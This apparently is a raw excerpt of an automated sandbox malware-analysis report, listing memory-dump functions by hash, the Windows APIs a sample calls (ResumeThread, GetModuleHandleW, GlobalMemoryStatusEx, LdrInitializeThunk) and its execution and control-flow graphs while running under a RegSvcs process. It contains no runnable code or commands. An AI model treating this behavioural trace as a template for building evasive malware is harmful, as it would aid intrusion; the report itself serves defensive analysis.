                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 341133468b6f201cad1bf968e6169e045021d617948a861bd836bccb1a720161
                                                                                                                • Instruction ID: 7db48c7b82df45c60ab68f9f1c066a38248b07bf4450592959c24891dd1cb71e
                                                                                                                • Opcode Fuzzy Hash: 341133468b6f201cad1bf968e6169e045021d617948a861bd836bccb1a720161
                                                                                                                • Instruction Fuzzy Hash: B611F0B6C007498FDB10DF9AD444BEEFBF8EB88228F14842AD519B7640D374A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 1099344824907c4ae0930255b6674ddebcfea288ac7e8d16464857db3514e0fd
                                                                                                                • Instruction ID: fc5f5f7ca5cff8e6de54c1e1fd0832cbdcef3ebe81391409bc75d2416cd0ffb7
                                                                                                                • Opcode Fuzzy Hash: 1099344824907c4ae0930255b6674ddebcfea288ac7e8d16464857db3514e0fd
                                                                                                                • Instruction Fuzzy Hash: F91146B59002098BDB10DFA9C4457DEFBF8EF88324F14882AD519A7240DB75A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 41a9924a0104af9b93ae38e6ab22010b9e045060c313f124f468dabf50f5eeb1
                                                                                                                • Instruction ID: 91a6684f48200f9983e9c9c194c5fd01354270f5fec365e8b74d9ae280b6c19a
                                                                                                                • Opcode Fuzzy Hash: 41a9924a0104af9b93ae38e6ab22010b9e045060c313f124f468dabf50f5eeb1
                                                                                                                • Instruction Fuzzy Hash: 661158B1D002088BCB10CFA9C4447DEFBF8EB88224F14882AD519A7240D775A944CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0744A0B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 11e08c00a4601af38fc9b34173c60093b97ab35ae13bf5953557fcc488197c19
                                                                                                                • Instruction ID: 5126a96320b0c0e3faa4da512a4d98e77a5aded1e61645fef70afc2d4dfe21c2
                                                                                                                • Opcode Fuzzy Hash: 11e08c00a4601af38fc9b34173c60093b97ab35ae13bf5953557fcc488197c19
                                                                                                                • Instruction Fuzzy Hash: 0D11F2B5800249DFDB10CF99D989BDEBBF8EB48324F14881AE514A3600C374A544CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0744A0B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 9cb0742de9891c74b3dee3a28f8512a2a4d0bb724cf93119b575c1d5a053b118
                                                                                                                • Instruction ID: d451ba24006ce6da969f26896802446886cfe6277c490457a72623ce396ab676
                                                                                                                • Opcode Fuzzy Hash: 9cb0742de9891c74b3dee3a28f8512a2a4d0bb724cf93119b575c1d5a053b118
                                                                                                                • Instruction Fuzzy Hash: 4A11D0B59002499FDB20CF99D989BDEBBF8EB58324F14881AE518A7700C375A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311038181.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f0d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9d12f926021668cf5d96b09f62538768039c5effb72aed4a0a11b97519043ab6
                                                                                                                • Instruction ID: 81e45f582f6e2a8c22beb387477539a2490a41ae901f686cbc4536344a0b6e04
                                                                                                                • Opcode Fuzzy Hash: 9d12f926021668cf5d96b09f62538768039c5effb72aed4a0a11b97519043ab6
                                                                                                                • Instruction Fuzzy Hash: 8E212876900244DFCB15DF94D9C0B36BF65FB88328F288569EC051B286C336D855FBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311085583.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f1d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7e02a91260117dfbc5e1630f2ac53bcb2ab1c59f0debc3483a3dc3cd867e22a8
                                                                                                                • Instruction ID: 03868df21a0ecbab8d29b7672e8d5e367839a0b2e9634fdc9a38e9888d192cac
                                                                                                                • Opcode Fuzzy Hash: 7e02a91260117dfbc5e1630f2ac53bcb2ab1c59f0debc3483a3dc3cd867e22a8
                                                                                                                • Instruction Fuzzy Hash: 8B212971904284EFDB05CF54D9C4B66BBB5FB84324F24CA6DD8094B345C736D886DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311085583.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f1d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 76979245dc0b4d0a4fe5e076067110777b97f14e2881cbb9f8743a8a43a1b586
                                                                                                                • Instruction ID: 50df2d8d77a8cd1a46fb3a76ad0e7f6a267313dc2a5d6ee66c58b27eeebc0a6a
                                                                                                                • Opcode Fuzzy Hash: 76979245dc0b4d0a4fe5e076067110777b97f14e2881cbb9f8743a8a43a1b586
                                                                                                                • Instruction Fuzzy Hash: 44210775904244DFCB14CF64D9C4B66BBB5FB88324F24C969D8094B34AC736D887DA62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311085583.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f1d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6737315af762cf40c980e4496ded252c033fe4370c140ede8f660a2de1017c19
                                                                                                                • Instruction ID: 9747bdc234c3ff744dbd5400d191537581d95bbd5fd994c6ef7e63681d5af00d
                                                                                                                • Opcode Fuzzy Hash: 6737315af762cf40c980e4496ded252c033fe4370c140ede8f660a2de1017c19
                                                                                                                • Instruction Fuzzy Hash: 2E2180755093C08FCB12CF24D990755BF71EB46324F28C5EAD8498B697C33A984ADB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311038181.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f0d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 979f001fcbb0c45d0b2bb7ca8105b2468487ef7bd4718e6c774501cbe6cc10b0
                                                                                                                • Instruction ID: 301d55f7aedced51dd6332de39573b26551439b11a644a9f92aa408810d3bf01
                                                                                                                • Opcode Fuzzy Hash: 979f001fcbb0c45d0b2bb7ca8105b2468487ef7bd4718e6c774501cbe6cc10b0
                                                                                                                • Instruction Fuzzy Hash: 1D11B176804280CFCB15CF54D9C4B26BF71FB98324F28C6A9DC450B656C336D85ADBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311085583.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f1d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 344e0ba04b572a39582da0223285ed487813a454782424945a2dbc52b412751e
                                                                                                                • Instruction ID: 80fa028e3ccd3cbb9636e59834b184a442031de21b9e07a7c92421cbda77d7da
                                                                                                                • Opcode Fuzzy Hash: 344e0ba04b572a39582da0223285ed487813a454782424945a2dbc52b412751e
                                                                                                                • Instruction Fuzzy Hash: FB11DD75904280DFCB15CF14C9C0B55FBB1FB84324F28C6ADD8494B656C33AD88ACB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311038181.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f0d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22e09d65514f5ac1587d0659fecbcfa3946f99ee4be382749b6a3b37ead9724e
                                                                                                                • Instruction ID: 8c489768277d99a5cd71ed3caed8b1ab38c36460e75493361fa5a8afa11c2ee7
                                                                                                                • Opcode Fuzzy Hash: 22e09d65514f5ac1587d0659fecbcfa3946f99ee4be382749b6a3b37ead9724e
                                                                                                                • Instruction Fuzzy Hash: 8401F7724043409AEB248BA5CC84BA7FBDCDF81338F18891AED041B2C2D7799C44FAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311038181.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f0d000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bd52369b363f4e0f4ad30ffbb45885cf1ca6f801f09500edfc7f8a8a691a6019
                                                                                                                • Instruction ID: 046c4c2ede6af7c93945abe9583c611135b98860a1f09f61910dc0a48c94b34c
                                                                                                                • Opcode Fuzzy Hash: bd52369b363f4e0f4ad30ffbb45885cf1ca6f801f09500edfc7f8a8a691a6019
                                                                                                                • Instruction Fuzzy Hash: 0CF062714042449AEB248E59CC88B62FBD8EB95734F18C45AED085B286D3799844DAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: F$UUUU$`F"e$pR}]
                                                                                                                • API String ID: 0-3286258706
                                                                                                                • Opcode ID: c500bef6c469ad523e68a5606b7068429a0b5311633f363fdd819aa25b180ccc
                                                                                                                • Instruction ID: 647877f8e194e2d2de5b740cc126a1f062f9798638ec6c68b40cc844a09dbd5d
                                                                                                                • Opcode Fuzzy Hash: c500bef6c469ad523e68a5606b7068429a0b5311633f363fdd819aa25b180ccc
                                                                                                                • Instruction Fuzzy Hash: 86616270E10629CFEB64CFA9C880B8DB7F1BB48314F1486AAD518E7256D7349A85CF15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 557460aae13002e562a2cf26c98b9064ccd9189b9d269121a7ca1e8dbfdd5e68
                                                                                                                • Instruction ID: 34fa76d2d7b0adccebf017fe8e94f0d4981d9a439f1bd1953028b0264061a5cd
                                                                                                                • Opcode Fuzzy Hash: 557460aae13002e562a2cf26c98b9064ccd9189b9d269121a7ca1e8dbfdd5e68
                                                                                                                • Instruction Fuzzy Hash: 0612F8F16237568BD710DF64F99E1893FA0BF45328B906208F2611BAD6DBB8154ACF84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e9125825623d4179965c846342f96022cd648191e0420cf34514c7f18b630cf5
                                                                                                                • Instruction ID: 6c6f6c6e91cb2d192b94f2d0661849eac639794a21b5a033dc2d48b2bb8136c4
                                                                                                                • Opcode Fuzzy Hash: e9125825623d4179965c846342f96022cd648191e0420cf34514c7f18b630cf5
                                                                                                                • Instruction Fuzzy Hash: 60A18E32E1031A8FCF05EFB9C8449DEBBB2FF85304B15857AE905AB261DB75A905CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6aaa65319e97f51c019e89148afafc5fb2fc9f5e14d7f86d682d7fddbe701b24
                                                                                                                • Instruction ID: ded08c10add88c0b3ef5383d6a2d95f68f47b4fbc795ef3d7b72f6b80d43887d
                                                                                                                • Opcode Fuzzy Hash: 6aaa65319e97f51c019e89148afafc5fb2fc9f5e14d7f86d682d7fddbe701b24
                                                                                                                • Instruction Fuzzy Hash: CDC109B16227568BDB10DF65F98E1897FB1BF85328F506308F1612BAD2DBB4144ACF84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7024f3b6a80eb7b9561b6f5af09bcef46d6d1d366ef5ac1d877e7e3adf6ad27
                                                                                                                • Instruction ID: 85a1ccefb10184993913884a155f0e5b80b048ef57592f69b28cb761a6ed3bc5
                                                                                                                • Opcode Fuzzy Hash: d7024f3b6a80eb7b9561b6f5af09bcef46d6d1d366ef5ac1d877e7e3adf6ad27
                                                                                                                • Instruction Fuzzy Hash: 7F51AEB1D056588BEB28CF6B8C442DAFAF3BFC9200F14C4FA95086B219DB310A85DF45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5e6086b1ba3065264f26687c5e7e874f8d8f1f3315246a707173aa08bf4d25a6
                                                                                                                • Instruction ID: 690722edeacd4c25fe9a2beb85bb9bdfb6e50ec938974a1b1748fdd04b9ed183
                                                                                                                • Opcode Fuzzy Hash: 5e6086b1ba3065264f26687c5e7e874f8d8f1f3315246a707173aa08bf4d25a6
                                                                                                                • Instruction Fuzzy Hash: 424154B1D056588BEB1CCF6B8D407CEFAF7AFC9200F14C5BA950DA6215EB3009869E15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.9%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:2.2%
                                                                                                                Total number of Nodes:228
                                                                                                                Total number of Limit Nodes:29

                                                                                                                Graph

                                                                                                                execution_graph 38916 17f9c78 38917 17f9c97 LdrInitializeThunk 38916->38917 38919 17f9ccb 38917->38919 38999 17fbc38 39000 17fbc4f 38999->39000 39005 17f9bd8 39000->39005 39002 17fbc89 39003 17f9bd8 LdrInitializeThunk 39002->39003 39004 17fbcba 39002->39004 39003->39004 39006 17f9be9 39005->39006 39008 17f9c0c 39005->39008 39006->39002 39007 17f9c39 39007->39002 39008->39007 39009 17f9caf LdrInitializeThunk 39008->39009 39010 17f9ccb 39009->39010 39019 17ff618 39020 17ff626 39019->39020 39022 17ff649 39019->39022 39021 17ff66e 39022->39021 39029 17fe4e0 39022->39029 39024 17ff89d 39035 17fe528 39024->39035 39026 17ff8be 39027 17fe528 4 API calls 39026->39027 39028 17ff8fe 39027->39028 39030 17fe4ee 39029->39030 39031 17fe511 39029->39031 39030->39024 39032 17fe576 39031->39032 39040 17fe8df 39031->39040 39052 17fe8f0 39031->39052 39032->39024 39037 17fe54d 39035->39037 39036 17fe576 39036->39026 39037->39036 39038 17fe8df 4 API calls 39037->39038 39039 17fe8f0 4 API calls 39037->39039 39038->39036 39039->39036 39041 17fe95f 39040->39041 39042 17fe8ea 39040->39042 39047 17fe97a 39041->39047 39073 17f9380 39041->39073 39049 17fe8df 3 API calls 39042->39049 39057 17fe918 39042->39057 39065 17fe928 39042->39065 39044 17fe8fe 39044->39032 39045 17fea46 GlobalMemoryStatusEx 39046 17fea76 39045->39046 39046->39032 39047->39045 39048 17fe97e 39047->39048 39048->39032 39049->39044 39054 17fe8df 4 API calls 39052->39054 39055 17fe928 2 API calls 39052->39055 39056 17fe918 2 API calls 39052->39056 39053 17fe8fe 39053->39032 39054->39053 39055->39053 39056->39053 39058 17fe95d 39057->39058 39059 17fe935 39057->39059 39060 17f9380 GlobalMemoryStatusEx 39058->39060 39059->39044 39063 17fe97a 39060->39063 39061 17fea46 GlobalMemoryStatusEx 39062 17fea76 39061->39062 39062->39044 39063->39061 39064 17fe97e 39063->39064 39064->39044 39066 17fe95d 39065->39066 39067 17fe935 39065->39067 39068 17f9380 GlobalMemoryStatusEx 39066->39068 39067->39044 39071 17fe97a 39068->39071 39069 17fea46 GlobalMemoryStatusEx 39070 17fea76 39069->39070 39070->39044 39071->39069 39072 17fe97e 39071->39072 39072->39044 39074 17fea00 GlobalMemoryStatusEx 39073->39074 39076 17fea76 39074->39076 39076->39047 39077 17fd098 39078 17fd0a9 39077->39078 39080 17fd0cc 39077->39080 39079 17fd0f9 39080->39079 39081 17fe45a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39080->39081 39082 17fe528 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39080->39082 39084 17fe4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39080->39084 39085 17fe634 39080->39085 39081->39080 39082->39080 39084->39080 39086 17fe635 39085->39086 39087 17fe677 39086->39087 39088 17fe8df 4 API calls 39086->39088 39089 17fe8f0 4 API calls 39086->39089 39087->39080 39088->39087 39089->39087 38920 5825190 38921 58251f8 CreateWindowExW 38920->38921 38923 58252b4 38921->38923 38939 58216b0 38940 58216df 38939->38940 38943 5820420 38940->38943 38942 5821804 38944 582042b 38943->38944 38948 5823348 38944->38948 38954 5823368 38944->38954 38945 5821d4a 38945->38942 38949 582334d 38948->38949 38960 58238b0 38949->38960 38952 5823439 38955 5823392 38954->38955 38959 58238b0 GetModuleHandleW 38955->38959 38956 5823410 38957 5822f44 GetModuleHandleW 38956->38957 38958 5823439 38956->38958 38957->38958 38958->38958 38959->38956 38961 58238d3 38960->38961 38962 5823410 38960->38962 38961->38962 38969 5823e58 38961->38969 38979 5823cef 38961->38979 38962->38952 38965 5822f44 38962->38965 38966 58241b0 GetModuleHandleW 38965->38966 38968 5824225 38966->38968 38968->38952 38970 5823e6d 38969->38970 38971 5823eb2 38970->38971 38972 5822f44 GetModuleHandleW 38970->38972 38973 5822f44 GetModuleHandleW 38971->38973 38978 582407e 38971->38978 38972->38971 38974 5824003 38973->38974 38975 5822f44 GetModuleHandleW 38974->38975 38974->38978 38976 5824051 38975->38976 38977 5822f44 GetModuleHandleW 38976->38977 38976->38978 38977->38978 38978->38962 38980 5823da7 38979->38980 38981 5822f44 GetModuleHandleW 38980->38981 38982 5823eb2 38980->38982 38981->38982 38983 5822f44 GetModuleHandleW 38982->38983 38988 582407e 38982->38988 38984 5824003 38983->38984 38985 5822f44 GetModuleHandleW 38984->38985 38984->38988 38986 5824051 38985->38986 38987 5822f44 GetModuleHandleW 38986->38987 38986->38988 38987->38988 38988->38962 39011 5826b50 GetCurrentProcess 39012 5826bc3 39011->39012 39013 5826bca GetCurrentThread 39011->39013 39012->39013 39014 5826c00 39013->39014 39015 5826c07 GetCurrentProcess 39013->39015 39014->39015 39016 5826c3d 39015->39016 39017 5826c65 GetCurrentThreadId 39016->39017 39018 5826c96 39017->39018 39090 582b670 39091 582b684 39090->39091 39094 582b8ba 39091->39094 39092 582b68d 39095 582b8c3 39094->39095 39100 582b9a0 39094->39100 39104 582ba9c 39094->39104 39108 582bab6 39094->39108 39112 582b991 39094->39112 39095->39092 39101 582b9e4 39100->39101 39102 582badb 39101->39102 39116 582bd97 39101->39116 39105 582ba4f 39104->39105 39106 582badb 39105->39106 39107 582bd97 2 API calls 39105->39107 39107->39106 39109 582bac9 39108->39109 39110 582badb 39108->39110 39111 582bd97 2 API calls 39109->39111 39111->39110 39113 582b9a0 39112->39113 39114 582badb 39113->39114 39115 582bd97 2 API calls 39113->39115 39115->39114 39117 582bdb6 39116->39117 39121 582bdf8 39117->39121 39125 582bde8 39117->39125 39118 582bdc6 39118->39102 39122 582be32 39121->39122 39123 582be5c RtlEncodePointer 39122->39123 39124 582be85 39122->39124 39123->39124 39124->39118 39126 582bdf8 39125->39126 39127 582be5c RtlEncodePointer 39126->39127 39128 582be85 39126->39128 39127->39128 39128->39118 39129 15ff12c 39130 15fef80 39129->39130 39131 15ff0fa 39130->39131 39135 15ff2f5 SetFileCompletionNotificationModes 39130->39135 39132 15ff059 Process32FirstW 39133 15fef8e 39132->39133 39133->39131 39133->39132 39134 15ff07f BasepProcessInvalidImage 39133->39134 39134->39133 39135->39133 39136 168d01c 39137 168d034 39136->39137 39138 168d08e 39137->39138 39143 5827961 39137->39143 39151 5825348 39137->39151 39155 5825338 39137->39155 39159 5823ca4 39137->39159 39146 58279b5 39143->39146 39144 58279e9 39176 5826964 39144->39176 39146->39144 39147 58279d9 39146->39147 39167 5827b00 39147->39167 39172 5827b10 39147->39172 39148 58279e7 39152 582536e 39151->39152 39153 5823ca4 CallWindowProcW 39152->39153 39154 582538f 39153->39154 39154->39138 39156 582536e 39155->39156 39157 5823ca4 CallWindowProcW 39156->39157 39158 582538f 39157->39158 39158->39138 39162 5823caf 39159->39162 39160 58279e9 39161 5826964 CallWindowProcW 39160->39161 39164 58279e7 39161->39164 39162->39160 39163 58279d9 39162->39163 39165 5827b00 CallWindowProcW 39163->39165 39166 5827b10 CallWindowProcW 39163->39166 39165->39164 39166->39164 39168 5827ac0 39167->39168 39170 5827b0e 39167->39170 39168->39148 39169 5826964 CallWindowProcW 39169->39170 39170->39169 39171 5827c0b 39170->39171 39171->39148 39174 5827b1e 39172->39174 39173 5826964 CallWindowProcW 39173->39174 39174->39173 39175 5827c0b 39174->39175 39175->39148 39177 582696f 39176->39177 39178 5827cda CallWindowProcW 39177->39178 39179 5827c89 39177->39179 39178->39179 39179->39148 38989 17fc148 38992 17fc15f 38989->38992 38990 17fc345 38991 17fc413 LdrInitializeThunk 38993 17fc430 38991->38993 38992->38990 38992->38991 38994 17f3dc8 38995 17f3dd9 38994->38995 38996 17f3dfc 38994->38996 38997 17f3e29 38996->38997 38998 5829fb0 SetFileCompletionNotificationModes 38996->38998 38998->38997 39180 5826d78 DuplicateHandle 39181 5826e0e 39180->39181 38924 15fee40 38925 15fee5e 38924->38925 38926 15ff0fa 38925->38926 38931 15ff2f5 38925->38931 38927 15fef8e 38927->38926 38928 15ff059 Process32FirstW 38927->38928 38929 15ff07f BasepProcessInvalidImage 38927->38929 38928->38927 38929->38927 38932 15ffa41 38931->38932 38933 15ff1f8 38931->38933 38932->38927 38933->38931 38933->38932 38935 5829fb0 38933->38935 38938 5829fc1 38935->38938 38936 5829fd1 38936->38933 38937 582a16b SetFileCompletionNotificationModes 38937->38936 38938->38936 38938->38937

                                                                                                                Executed Functions

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1663 17fc148-17fc1a6 1671 17fc1ac-17fc1d7 1663->1671 1672 17fc345-17fc34f 1663->1672 1676 17fc1dd-17fc1ff 1671->1676 1677 17fc355-17fc37f 1671->1677 1676->1672 1680 17fc205-17fc20e 1676->1680 1681 17fc3a4-17fc42a call 17f6008 call 17f6120 LdrInitializeThunk 1677->1681 1682 17fc381-17fc38b 1677->1682 1680->1677 1683 17fc214-17fc21c 1680->1683 1713 17fc573-17fc590 1681->1713 1714 17fc430-17fc44a 1681->1714 1684 17fc38d-17fc39e 1682->1684 1685 17fc3a0-17fc3a3 1682->1685 1686 17fc222-17fc235 1683->1686 1687 17fc330-17fc334 1683->1687 1684->1685 1698 17fc23b-17fc27f 1686->1698 1699 17fc31a-17fc32b 1686->1699 1690 17fc336-17fc33f 1687->1690 1691 17fc350 1687->1691 1690->1672 1690->1680 1691->1677 1698->1699 1718 17fc285-17fc29f 1698->1718 1699->1687 1732 17fc595-17fc59e 1713->1732 1714->1713 1719 17fc450-17fc46a 1714->1719 1718->1699 1726 17fc2a1-17fc2b7 1718->1726 1723 17fc46c-17fc46e 1719->1723 1724 17fc470 1719->1724 1727 17fc473-17fc4ce call 17f9094 1723->1727 1724->1727 1726->1699 1733 17fc2b9-17fc2d2 1726->1733 1744 17fc4d4 1727->1744 1745 17fc4d0-17fc4d2 1727->1745 1733->1699 1739 17fc2d4-17fc318 1733->1739 1739->1687 1747 17fc4d7-17fc571 call 17f9094 1744->1747 1745->1747 1747->1732
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555753346.00000000017F0000.00000040.00000010.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_17f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: bc041522fb9c86e2fa0da308c7d294dfe9354d5812b4de611f22212f0f21fde4
                                                                                                                • Instruction ID: f17ec16bc0e3cf6b1f77556681b6e78912224421305f72d6f7f4f609a5cd8a04
                                                                                                                • Opcode Fuzzy Hash: bc041522fb9c86e2fa0da308c7d294dfe9354d5812b4de611f22212f0f21fde4
